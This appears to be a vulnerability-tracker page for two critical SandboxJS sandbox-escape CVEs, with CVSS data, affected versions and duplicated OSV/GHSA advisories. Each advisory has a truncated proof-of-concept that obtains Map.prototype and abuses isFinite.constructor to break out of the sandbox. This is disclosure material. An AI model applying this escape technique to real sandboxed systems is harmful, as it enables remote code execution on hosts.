CVE-2026-25142
published 2026-02-02CVE-2026-25142: SandboxJS is a JavaScript sandboxing library. Prior to 0.8.27, SanboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes…
PriorityP264critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
1.09%
61.2th percentile
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.27, SanboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution. This vulnerability is fixed in 0.8.27.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nyariv | sandboxjs | < 0.8.27 | 0.8.27 |
| nyariv | sandboxjs | >= 0 < 0.8.29 | 0.8.29 |
| nyariv | sandboxjs | >= 0 < 0.8.27 | 0.8.27 |
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ghsa10.0CRITICAL
osv10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
@nyariv/sandboxjs has a Sandbox Escape vulnerability
osv·2026-02-05·CVSS 10.0
CVE-2026-25587 [CRITICAL] @nyariv/sandboxjs has a Sandbox Escape vulnerability
@nyariv/sandboxjs has a Sandbox Escape vulnerability
### Summary
As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped.
### Details
This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged:
```js
let a = Map.prototype;
console.log(a) // undefined
```
```js
const a = Map.prototype;
console.log(a) // Object [Map] {}
```
```js
let a = 123;
console.log(a) // 123
```
```js
const a = 123;
console.log(a) // 123
```
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"retur
GHSA
@nyariv/sandboxjs has a Sandbox Escape vulnerability
ghsa·2026-02-05·CVSS 10.0
CVE-2026-25587 [CRITICAL] CWE-74 @nyariv/sandboxjs has a Sandbox Escape vulnerability
@nyariv/sandboxjs has a Sandbox Escape vulnerability
### Summary
As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped.
### Details
This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged:
```js
let a = Map.prototype;
console.log(a) // undefined
```
```js
const a = Map.prototype;
console.log(a) // Object [Map] {}
```
```js
let a = 123;
console.log(a) // 123
```
```js
const a = 123;
console.log(a) // 123
```
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"retur
OSV
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
osv·2026-02-02
CVE-2026-25142 [CRITICAL] SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
### Summary
SandboxJS does not properly restrict `__lookupGetter__` which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.
### Details
https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398
The Object prototype which contains `__lookupGetter__` is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
i
GHSA
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
ghsa·2026-02-02
CVE-2026-25142 [CRITICAL] CWE-1321 SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
### Summary
SandboxJS does not properly restrict `__lookupGetter__` which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.
### Details
https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398
The Object prototype which contains `__lookupGetter__` is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
i
No detection rules found.
No public exploits indexed.
2026-02-02
Published